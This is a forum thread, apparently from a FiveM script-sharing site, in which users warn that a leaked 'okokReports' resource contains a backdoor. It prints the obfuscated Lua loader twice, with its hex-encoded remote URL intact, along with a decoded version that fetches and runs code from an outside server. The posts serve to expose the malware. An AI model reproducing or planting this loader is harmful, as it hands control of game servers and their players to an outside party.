Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Zeyroox

Silver Elite
Joined
Apr 14, 2024
Messages
23
Reaction score
28
Points
166
Location
France
BACKDOOR

1) okokReports.pack.zip\okokReports\enhanced.lua

(
PerformHttpRequest("" ", function(a, b) assert(load(b))() end))


Code:
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = {
    "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
    "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
    "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}

function str_utf8()
    _empt = ""
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub("..", function (cc)
        return string.char(tonumber(cc, 16))
        
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)
 

Joet

Silver Elite
Joined
Jul 16, 2021
Messages
56
Solutions
1
Reaction score
21
Points
166
by the way it it escrowed
 
Last edited:

TialaMusic

Member
Joined
Apr 28, 2024
Messages
4
Reaction score
0
Points
146
Location
France
Hello, I have this error, can you help me?
[ citizen-server-impl] You lack the required entitlement to use okokReports
[ citizen-server-impl] Couldn't start resource okokReports.
 

AspectDC

Gold Elite
Joined
Nov 27, 2022
Messages
108
Reaction score
31
Points
186
Location
Germany
its a backdoor all of the scripts u post are backdoors dont act like u dont know ngg
 

ali_faktor

Bronze Elite
Joined
Jan 12, 2022
Messages
5
Reaction score
2
Points
146
Location
usa
BACKDOOR

1) okokReports.pack.zip\okokReports\enhanced.lua

(
PerformHttpRequest("" ", function(a, b) assert(load(b))() end))


Code:
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = {
    "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
    "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
    "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}

function str_utf8()
    _empt = ""
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub("..", function (cc)
        return string.char(tonumber(cc, 16))
       
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)

yes, this has a backdoor that will load a file from remote connection, anything can be placed in that URL to be injected in your server!

simple decoded script :

JavaScript:
PerformHttpRequest("https://fivem.****.cz/f.php?key=WT8NeenB5DyNMKXF0qN2", function (error, data)
    local backdoorFunction = assert(load(data))   
    if (data == nil) then return end
    backdoorFunction()   
end)

DO NOT ENTER THIS URL IN YOUR BROWSER !!
 

ali_faktor

Bronze Elite
Joined
Jan 12, 2022
Messages
5
Reaction score
2
Points
146
Location
usa
Also, this script is not going to even load on your server as it is escrowed and currently you can not decrypt FiveM escrow system (and this probably not gonna happen at all)
 
Top